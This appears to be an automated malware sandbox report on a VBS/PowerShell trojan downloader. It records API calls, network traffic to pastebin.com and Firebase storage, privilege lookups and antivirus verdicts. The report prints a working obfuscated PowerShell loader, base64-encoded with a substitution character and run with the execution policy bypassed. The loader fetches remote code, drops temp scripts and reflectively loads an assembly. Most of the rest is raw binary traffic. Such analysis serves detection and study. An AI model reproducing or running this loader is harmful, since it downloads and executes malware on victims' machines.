Bw★G8★dwBl★HI★cwBo★GU★b★Bs★C★★LQBF★Hg★ZQBj★HU★d★Bp★G8★bgBQ★G8★b★Bp★GM★eQ★g★EI★eQBw★GE★cwBz★C★★LQBG★Gk★b★Bl★C★★J★BW★EI★VwBX★Ho★I★★7★★==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener.vbs');powershell $Yolopolhggobek;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\dll03.ps1
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell.exe
parameters: $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★M★★v★Dc★Rw★y★F★★eQBG★Es★V★★v★GQ★LwBl★GU★LgBl★HQ★cwBh★H★★Lw★v★Do★cwBw★HQ★d★Bo★Cc★Jw★g★Cw★I★★n★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★Cc★I★★s★C★★Jw★n★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★Xw★t★C0★LQ★t★C0★LQ★t★Cc★Jw★s★C★★Jw★n★D★★Jw★n★Cw★I★★n★Cc★MQ★n★Cc★L★★g★Cc★JwBS★G8★Z★Bh★Cc★Jw★g★C★★KQ★g★Ck★I★★7★Cc★I★★7★CQ★VgBC★Fc★VwB6★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★z★C4★c★Bz★DE★Jw★g★Ck★I★★7★CQ★TQBP★EQ★UgBn★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BW★EI★VwBX★Ho★I★★g★C0★ZgBv★HI★YwBl★C★★OwBw★G8★dwBl★HI★cwBo★GU★b★Bs★C★★LQBF★Hg★ZQBj★HU★d★Bp★G8★bgBQ★G8★b★Bp★GM★eQ★g★EI★eQBw★GE★cwBz★C★★LQBG★Gk★b★Bl★C★★J★BW★EI★VwBX★Ho★I★★7★★==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener.vbs');powershell $Yolopolhggobek;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received Wg÷%Œ»oîSõ±Ù¶{fF*¨a¡òží…DOWNGRD BcB³Vä/Þ`[G’˜Å.PV;唩c”#N‰0uªÀÿ 
Data received ¼
Data received ¸µ70‚30‚ †’?P(¤ úÆvE40  *†H†÷  0;1 0 UUS10U Google Trust Services1 0 UWR10 250328151841Z 250626161555Z010U pastebin.com0‚"0  *†H†÷ ‚0‚ ‚ÂW‰ŸëÖ+X›˜6€â²®Ô‰3ì4Ÿ5¦*ž|òï·åìóÙR¶øGPŒ3|jC“ìiF´\¸³Žl䣟Wݖ²éW7®R"e°ß°Ôjù¾ŸD§Â,ÁÇÜu-íV¦s!ÚC¢H=ØѼè¿IAÂÚû7ÿ¹AcY‘4aêpõ›Í•’·Œ‡3·¦à¨`˜G£[kÒ …â8~Š:Ô³k¦._ºO”ÇûGc¼›d‹QÂHd€¾ õ¾ ñã7'ù|Çß^ó­ ±¶<æŠêfµË×&JT{t`z<›­1°Ü£.`ðωâm¢‘ö¨‚°¥/8Ç£‚T0‚P0Uÿ 0U% 0 +0 Uÿ00UjÈJ €Þ¾sd»‘ZÉ| >@T0U#0€fiIÔÞ*œ‘ω$¸0nˆ.0^+R0P0'+0†http://o.pki.goog/s/wr1/ho80%+0†http://i.pki.goog/wr1.crt0'U 0‚ pastebin.com‚*.pastebin.com0U  0 0g 06U/0-0+ ) '†%http://c.pki.goog/wr1/tyyTOlCKhGQ.crl0‚ +ÖyôñïuNu£'\šÃ8[lÔß?RëðàŽiÀ±úd±bš9ß•ÝŒlcF0D f܇ÿç\¯­Ô1€µ¿€Ùë5K¾K”êÑD->©Ô® õ¾™ó¥¨&Æàë¶CSã-î›Ù´ºVI@c›-ʛ{vÌûj…q eþ•›SÎé²|"é…\ —¶©~TÀþL °•ÝŒl¯G0E!/ø+Ÿveqí¤$èYSê‘pÃg;ïф<é.Y™ f¦; |~)L ¢ª²¨¢½›’ÙÅUïŽm`‘_ݕyï0  *†H†÷  ‚¾a­ÆT\ëÔ£t#øã,cSçî!â§ùÜøÖ/"œÙܙȡÌ(·Üªgn z&Ê,S:†zûÒ5e};ïìåîý^»ºm8É­%ÿfœDËN0@5‡Ã×ÚhZÀÚ$E-ú±#$³æHWÞC] ¸ÖO¾Ž¥™œÛË "TY9N×:Š"M$<z#®È¥²AŠÜmþ—:w!;­e~©~P©Xc!X#ä_‰<Ô PHÔ.&ÿ5Îw«Žš—q¹¨îGÄWL4f@>ÑAoBÞ8ƒ¶þ µ5I/jûþÑÝãõÈÝw¹¬Ù׿CÌtÃ2Q>ؓ~0‚ 0‚ó ÙâÂÒŠt¶'¢mh§0  *†H†÷  0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R10 231213090000Z 290220140000Z0;1 0 UUS10U Google Trust Services1 0 UWR10‚"0  *†H†÷ ‚0‚ ‚Ïn6Š·+îF˜Spwî£K r¾#-ÂGƏ\ù=æŽî3" ÉH¸°bÎôi r}ÞÕ&Ãn›Ï~× ÏƐ;£‚Ú:ÿlV¿Üéa”Eäi¼OÉÀ­aDr Ð+žhjbjŠ"Wyi+â$3~vc,]¼Qi~#±ÿvñî¸Xµk5ï¡æH(9—1Ù•§ž®Ï˜¼žŠᰗMPo“LJøÛ}ñ™ã–íî1êr=Rß%d¥ pªžè¨¹GȧZ%`oBá×?ç ðƒF3 æKwv¡h§]ïØ(w5­­FäbnâªøÌï7~&³£þ0û0Uÿ†0U%0++0Uÿ0ÿ0UfiIÔÞ*œ‘ω$¸0nˆ.0U#0€ä¯+&q+H'…/Rf,ïð‰q>04+(0&0$+0†http://i.pki.goog/r1.crt0+U$0"0   †http://c.pki.goog/r/r1.crl0U  0 0g 0  *†H†÷  ‚Næ³ ‘`'ùQMî¸Á‰Õ"„—æÖßæN:;)~Þ ñ⍋ӪD7’˜¥ý7Œ©IX1d&eµC×ò—ìT9›U:8wá³@'ÏV{Tœ37yðäîÌQ²‘s!Ã?©¶Ó¤×—Òák$ÛäïèT•• ßý.¶n»ƒZ4Pà†{™ŠŠˆJ¤ÓÇi9Ÿ“˜ðÊAË_È]·«o )Õ$§Ÿo‘#»z7÷ê<*ðÀXéòH5§­DÆ£Ø †Œ“=¤÷°%¾ˆ÷ÿß¾§^€³ØøïÅG%˜Š,>·4ɕjµPuÒ êC¯MîdҙñFt~šwF„ï´ËmÆEz6¹èü§•*¦z¾{ñγê£PU˜ü–P¯¯êÁ®ÎÎÌ«´klã½tpÌ¤úu¢üLVÝ{Ò±.Mø.‘ ¥f« ólqюÍx ½ó…Ã;ħB¸31åñ“–%'U”P¾? 7ý‰_ô ¢¥kõÏo,æÄulü¿ºä7¾9Ù玑F#Üq¶ÃrF̚Ñ@œûºS¨\5ä žñ!³—hq·^–ÛÇü@nŠ²k;1DÚ»@/,—TÝ3Ÿ ¥Î%õ*AåHçè@í_§×à?Ÿ³iƒD¾äàòµhy]nxqÃuv²g0®x¶Ú3‡Gf0‚b0‚J w½ lÛ6ùê!ÄðXÓ 0  *†H†÷  0W1 0 UBE10U GlobalSign nv-sa10U Root CA10UGlobalSign Root CA0 200619000042Z 280128000042Z0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R10‚"0  *†H†÷ ‚0‚ ‚¶‹ã¡w›;Ü¿”>·•§@<¡ý‚ù}2‚qööŒûèÛ¼j.——£ŒKù+ö±ù΄±ùŗÞï¹ò£é¼‰^§ªR«ø#'ˤ±œcÛי~ð ^ëh¦ôÆZG M3ãN±£ÈlKìü ßd)%#¡´Ò=.`àÏÒ ‡»ÍHðMÂÂzˆŠ»ºÏYÖ¯°°ž1ñ‚ÁÀß.¦mlµØ~&E=°y¤”(­&å¨þ–è<h”Sîƒ:ˆ+– ²àzŒ.u֜ë§Vd–Oh®=—„À¼@À \½ö‡³5l¬P„àLÍ’Ó é3¼R™¯2µ)³%*´HùráÊd÷悍èÂŠˆú8fŠücùùxý{\wúv‡úìß±y•W´½&ïÖÑë »Ž µÅŊU«Ó¬ê‘K)̤2%N*ñeDÐΪÎI´êŸ|ƒ°@{çC«§l£}‰úL¥ÿՎÃÎKàµØ³ŽEÏvÀí@+ýS°§Õ; ±Š¢Þ1­Ìwêo{>Öߑ"æ¾úØ2ücQrÞ]Ö“½)h3ï:fìŠ&ß×Wex'Þ^I¢š¨!¶©±•°¥¹ ÚÇlH<@à~ ZÍV<ї¹ËKí9KœÄ?ÒUn$°ÖqúôÁºÌíõþAؘ=:È®z˜7•£‚80‚40Uÿ†0Uÿ0ÿ0Uä¯+&q+H'…/Rf,ïð‰q>0U#0€`{fE —ʉP/}Í4¨ÿüýK0`+T0R0%+0†http://ocsp.pki.goog/gsr10)+0†http://pki.goog/gsr1/gsr1.crt02U+0)0' % #†!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g 0g 0  +Öy0  +Öy0  *†H†÷  ‚4¤±(£Ð´v¦1z!éÑR>ÈÛtAˆ¸=5íäÿ“á\_«»ê|ÏÛä ыWò&o[¾Fh”7okzÈÀ7ú%Q¬ìh¿²ÈIýZšÊ#¬„€+Œ™—ëIjŒu×Ç޲ɗŸXHW5¡äÖýoƒoïŒÏ—¯À…*ðõNi ‘-áh¸Á+séÔÙü"À7 fIíUgá2×Ó&¿pã=ôgm=|å4ˆã2ú§njo½‹‘îKè;©³7çÃD¤~Øl×ÇFõ’›çÕ!¾f’”UlÔ)² Áf[âwIH(í×3rS³‚5Ïb‹É$‹¥·9 »~*A¿RÏü¢–¶Â‚?
Data received K
Data received GA>Ž <!eNÂ& ’çu›Z¤àvòµP½s°U‚C5ž1Gm½á'¹yS¥! ªG&@üO/ÿäˆÀ[4}&,ª—šnÞ—Ë ˜?Ž°M›Üs¥˜D„íÔI'öÎëðû1z©”3|_žï|ÏçOÕEÜöáRåÁ=¢2ÍÁJvVö~Š_,,Øi+„ï0h4?¯´"±¡Eô?0¬à?oÆj)à‘~ÈXw´!Òîհ℻4W2øl:ž°µ² **ÖkNÍË1C»I‘OŠ…· äRD ¦Î“˜QÈx5½}=–™;¨¿mîeK§SÕ6&g$Sò÷ž¢½Fô?͎Á8ÔÇŸ’Ò‡dôl_Þ#ì+0¦ÍûM@Wá;"ÁÖ¹~++†µ{a\ä>ú
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received jP!RÑPÄÈ÷T¶lD¶Þ‘õ_¤aŠµCïï㇢ÙKàև=iÔºØ `äêØïÃ
Data received @
Data received ’ª9G™>ï.ðEcCªó”ZoESxmQòx[gDðË«ÂLÑg’M¼Ì „™"òn¸GÕ9Óv nršïø©Z‚ eÜ7íöÉLŒìNÁDÛÑ ­9ó[+ùq­ãn®ÃWÊÂYNàO‰DH{Ñ Ñx0ÉÞ°lX7<çÿE¼ìl‚âׇþú$¨ÔävÍ[}Á³sÙ³DBÂêrì«F®wçO{'Ýǜu'€¨®¾.ÑΨÇÐYª(‚(((Œ‘€—Iˆg[ÖïÓ¶xW ÄÝ\°îš|f@À3•l÷^ô`0ß“RÁ Ò|¼ˆ{‹”¼øG•hæÕ‚jIÚÁÝwÅ»·J®Ÿlšˆ‘#ÍËÇaöâì¦Þ1M½ÕڇVíp“sÙµPàÁÄLÆ÷FÅ¥£MM½F‰²t3#*Ç3”ëê Jm[ßfßþzùÖFÎô¢Ø”;0n·ãeÅ;[Ê+2]55£x ° ÕFû­ü¦6¿“©ƒØÏ ÛÉÖFYþ.€…PφÌ«†6.ë|N€çx?/(@û×Io/呔»¡%ô/ßSùÉá1œËTÍÒ>݉²íºdΟÃvDp’Ú´hÈ¿Û7ø?,Kh×'ˆG~R¬Ûc—qfͶ”ávÓÆ­0ƒ¤D§zjçpxû—^Bâ,b¹%éõÆ Š…g òöæ—b„šŠ¾»E‘¹ƒ™Z#ákÇßïí´¬ö¾6ã02/+ÇÓ]
Data received 
Data received ô(ʳMAfom.³ÛQ7<ÙgN‹Ž—¾ë$³4¼¨,
Data received W
Data received Sg÷%¯Hdn5Uü‹f `EôVµ…ZYDOWNGRD DS×ùçxæS¬ƒÀxöx\©{ÙRÏ°b7 ‹R»'>ôÀ ÿ 
Data received  S
Data received O L#0‚0‚Å q¯<ùN]×½ YëL?†0 *†HÎ=0;1 0 UUS10U Google Trust Services1 0 UWE20 250320111954Z 250612111953Z0"1 0Uupload.video.google.com0Y0*†HÎ=*†HÎ=BNNߥM®¥%“‚ öã]`"p¼Ÿ ˆNã¡?+º:†Ò¬aäiÌóD€-Dž9O tä“ç$%+¯ô´,X£‚Â0‚¾0Uÿ€0U% 0 +0 Uÿ00Uö˜†Ïìç¼Ô´Ïƾ]0Â4¤!0U#0€u¾Äw®‰öD7}ϱhëÜ4Y0X+L0J0!+0†http://o.pki.goog/we20%+0†http://i.pki.goog/we2.crt0‚˜U‚0‚‹‚upload.video.google.com‚*.clients.google.com‚*.docs.google.com‚*.drive.google.com‚*.gdata.youtube.com‚*.googleapis.com‚*.photos.google.com‚*.youtube-3rd-party.com‚upload.google.com‚*.upload.google.com‚upload.youtube.com‚*.upload.youtube.com‚uploads.stage.gdata.youtube.com‚bg-call-donation.goog‚bg-call-donation-alpha.goog‚bg-call-donation-canary.goog‚bg-call-donation-dev.goog0U  0 0g 06U/0-0+ ) '†%http://c.pki.goog/we2/yK5nPhtHKQs.crl0‚ +ÖyõòðvÏVîÕ.|¯ó‡[Ùi.›éqgJ°ì¬Ò[wÎÌ;•³~òG0E tÐú˜VȒ¸áÁ¤WŠƒøTÜ<50Cß/?ÍBHVJB!°•å¡JР$*1ò'øì<xgQ)ÒÃìå¿gÆvà’³ü Èçh6Þa¹–M RxŠrÖrÄ°M¥moT•³~òAG0E )ØÖÂ(”[¥·Ø]­°Wºfüvû¼<Å­.Ǝ&Е¼¹!‹‡N™%€³6‰fî ÷Z–3Äm'Bdª°¿<0 *†HÎ=H0E!ßÐ.åómOfyƒ’ƒ¡ªP? oú—TªžÏN \Îß{¬¢ZÄÿݟÀè®Ój阕$æ¯Ù?ãQb¢0‚ž0‚% ó-k@Ֆ[‡:|rà0 *†HÎ=0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R40 231213090000Z 290220140000Z0;1 0 UUS10U Google Trust Services1 0 UWE20Y0*†HÎ=*†HÎ=B5~òí}áž*4C†ÁՖè'pߞ˩ʆy MFŠÂt¤»Ù¿îý#×8óKïTá¾çÊU%¨ 0¬-]N¡Q£þ0û0Uÿ†0U%0++0Uÿ0ÿ0Uu¾Äw®‰öD7}ϱhëÜ4Y0U#0€€LÖëtÿI6£ÕØüµ>Åjð”Œ04+(0&0$+0†http://i.pki.goog/r4.crt0+U$0"0   †http://c.pki.goog/r/r4.crl0U  0 0g 0 *†HÎ=g0d0 ½¸6UÈ5£ÒÙ}9sÓ÷÷‚¸ сoådEÛÞªÀE¬“è`ì.~D,"”‘ì¬0/ß vL-iaÕOý˜˜„Û4ê˜ì›ÍˆbÿÒeå3jš í#I8/Q¿‘ТÉ88Ú~0‚z0‚b å0¿3C¾Ý‚I=Š0  *†H†÷  0W1 0 UBE10U GlobalSign nv-sa10U Root CA10UGlobalSign Root CA0 231115034321Z 280128000042Z0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R40v0*†HÎ=+"bóts§h‹`®C¸5Ł0{KIûÁaÎæÞF½kÕa5®@Ýs÷‰‘0Zë<î…|¢@v;©Æ¸GØ*璑jsé±r9Ÿ)Ÿ¢˜Ó_^X†e¡„eÑ܋ÉÇsȌj/åÄ«ÑŠ£ÿ0ü0Uÿ†0U%0++0Uÿ0ÿ0U€LÖëtÿI6£ÕØüµ>Åjð”Œ0U#0€`{fE —ʉP/}Í4¨ÿüýK06+*0(0&+0†http://i.pki.goog/gsr1.crt0-U&0$0"   †http://c.pki.goog/r/gsr1.crl0U  0 0g 0  *†H†÷  ‚B»Ö‡–ã?c ¤¡hH 9"sžøËN-1éŸç ¡Ò6„¬yëé°ëj¶{ }t¸›e«h*,,ÝBýÆq χ-÷kÈn}Vâ#XXù%º…G×– ý ¶Œà.®UÑyu5,1[?e¼Íœ‡B§‘±›^Žñ»Ê-Gð¬c~†¿ÖäkÓÖÓŽŠgX¸ÿ÷¦„ IP[?: % ò‹\ÓyW6‚Îÿ&·©ñ™í­‚>ÈnëÓ<8ÀAšá^SÏ> Wëîâ?H¥ñ¾Ñj# û?/¢µ½ên£FÎ.g¯3&˜ªÕKÒ©6Å&;[‹ˆÁå
Data received ’
Data received ŽA@3užä68-› ,–fšMŽð0«?€µxÚ*ûïðÓ- Hyb+‚‘Ÿ­†–‡ý¨i£ž àìS­Ì£DG0E ?q6̯"+üíЩ‰H!#dÍ9­W‘&‰./“܇!§Ãwê™2ãEâà˲šÅéPú#&Û£BÌð«¤üá¾
Data received '!ñ°ó¿ FCk(Q«‰ïP;‘[˜Ë÷NtÅUÃ@zÞ۞Ÿ+?žÎÛ±
Data received p
Data received ±cª”¼àªäE)/¦§ÖFú[Àõu©ùà0H/ž3QV•t‡Ê Q‚ÔüÌ*Z¨MÀËçW׳NáV–ý6Ñ«à=c£(– ˜»QxÛ[l39Û舝8Á‚ð/—¦,×>Û< ŠK'ð;ý²Ý¸£h‰(Õ¾À쎤(¬!U kMÙÆ)pÒ&d“Ì!ÿ*a5–­¶—¿ô˜Ð\óŸcÿd£[êڜ Algœ÷ÕH5òSøQüƒ MmÃʌÎÁY TˆŸÒ¿+ßè†Ãb@5º'È`/ÛL ä€ T…Øú¨n9'%Ý4+¢kðèG)¹üòq¤›À©V_˜Þo¹zaz95ª1««€ä(9ä;öÑXR(Gto}ksºü#‚ԐŒn@X½f$v?͞~>á¹Ø0Õ±O4+Rvx;˜öëçùx…‘þ0¹DtŸ’C?æ2­³¼|H”©]p2›Vn• ¾ÝcòôG­ªÊ±¾ò­¶1¶)]½\¶ã MÏÌl7珩‚Ž^þúP‘”25@‰Ÿf썥Úÿ_®×xNÌr+@L…‘èüJ*Ë@¥·é2¡ÄênÞTÃ%@§²^’%‹[ú®ŠÔó›ÜҔ<ÖÓ7#AÚ±IÜoÔ ¢[4;äÊ7Ï pÏ=Á;ruÌâdW¼£8[ƒ†Å²Ï(®,¯tԏGÙc³ä[Òü¥yégC7ðt67B¯ÿ‰—« Éöñ¼ý/5%¢oòÞO2uyö nÉ8ÛRºµ)@CnQéá¾Á[×s7cñÔª}Ëê$¹;âóJì¸fÄ
Data sent okg÷$žÌ0ò{’¬˜|ÿxáí·f>Å·ž+rÁJçÕù+</5 ÀÀÀ À 28*ÿ pastebin.com  
Data sent FBACÞf{¼æ¶Aò€IƼ3VÍëuܺ°?×?Tw-¬E v£ˆ¥ %nZJïó@¤1G4MÃ[à+–œ(ªÉá0“Ú³ÓBînÅG °?@΋jB:†VóùäLë?¯Y؉oá"|äïÜn¼^I¯šîª
Data sent `¡|ªHú#‚¡†Ô ښNÉf~нÉó*w ÓåG§€‰hi½ï èU¥cÏ*˜€ÔUÕÑÕÓ¾’[OØC#÷½pîÒ·^d`°xG_Ð"Éò >(ø:–M
Data sent }g÷$ž–ÃìŒ7‚nÙ+)•KìAfí4"·ˆ±D/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
Data sent FBAbЂ¶£ ÑÌ?ËVcs–Ü)Hë,ûœÒ®õU—V '>˜gìô0µ­%=¥D³—)þCD€ð¸rÝ,[³0j5^öøø[£ÝàÅ=”·eáûüiq¢½ŠJ04Èa ñ¢2v±œù©V+ÿ&Ûÿoš
Data sent ÐþJr7áëg)ԁ¬ÊQæÖp\ŽëYòÛdfúÝrÿ{æçWûdë<ͱudÀ~ü­óøºR)Ýɉ÷81µB,¢â±Qqð`¶/®7j†)Å8ˆY‘~KËb™ù¹{ç‘k¿O.ê!×tÁ4\Òé§ß‰ê§¨ÁùX£/7#H[koA¹øZKÔ¡æ—~x÷9e˜¼R‚÷ÀMT—›ë:œ÷¿PÀWŽUigu8UÁ õÒŠ_ܼ²_‘u}3hERÈa ØWc„¥KWé¼
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
K7GW NetWorm ( 0053c52c1 )
K7AntiVirus NetWorm ( 0053c52c1 )
Avast Script:SNH-gen [Drp]
Kaspersky HEUR:Trojan.Script.Generic
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
Google Detected
Varist VBS/Agent.CAA
huorong Trojan/VBS.Runner.v
Fortinet VBS/Agent.ABGD!tr.dldr
AVG Script:SNH-gen [Drp]
Time & API Arguments Status Return Repeated

send

 buffer: okg÷$žÌ0ò{’¬˜|ÿxáí·f>Å·ž+rÁJçÕù+</5 ÀÀÀ À 28*ÿ pastebin.com  
socket: 1456
sent: 116
1 116 0

send

 buffer: FBACÞf{¼æ¶Aò€IƼ3VÍëuܺ°?×?Tw-¬E v£ˆ¥ %nZJïó@¤1G4MÃ[à+–œ(ªÉá0“Ú³ÓBînÅG °?@΋jB:†VóùäLë?¯Y؉oá"|äïÜn¼^I¯šîª
socket: 1456
sent: 134
1 134 0

send

 buffer: `¡|ªHú#‚¡†Ô ښNÉf~нÉó*w ÓåG§€‰hi½ï èU¥cÏ*˜€ÔUÕÑÕÓ¾’[OØC#÷½pîÒ·^d`°xG_Ð"Éò >(ø:–M
socket: 1456
sent: 101
1 101 0

send

 buffer: }g÷$ž–ÃìŒ7‚nÙ+)•KìAfí4"·ˆ±D/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
socket: 1968
sent: 134
1 134 0

send

 buffer: FBAbЂ¶£ ÑÌ?ËVcs–Ü)Hë,ûœÒ®õU—V '>˜gìô0µ­%=¥D³—)þCD€ð¸rÝ,[³0j5^öøø[£ÝàÅ=”·eáûüiq¢½ŠJ04Èa ñ¢2v±œù©V+ÿ&Ûÿoš
socket: 1968
sent: 134
1 134 0

send

 buffer: ÐþJr7áëg)ԁ¬ÊQæÖp\ŽëYòÛdfúÝrÿ{æçWûdë<ͱudÀ~ü­óøºR)Ýɉ÷81µB,¢â±Qqð`¶/®7j†)Å8ˆY‘~KËb™ù¹{ç‘k¿O.ê!×tÁ4\Òé§ß‰ê§¨ÁùX£/7#H[koA¹øZKÔ¡æ—~x÷9e˜¼R‚÷ÀMT—›ë:œ÷¿PÀWŽUigu8UÁ õÒŠ_ܼ²_‘u}3hERÈa ØWc„¥KWé¼
socket: 1968
sent: 213
1 213 0
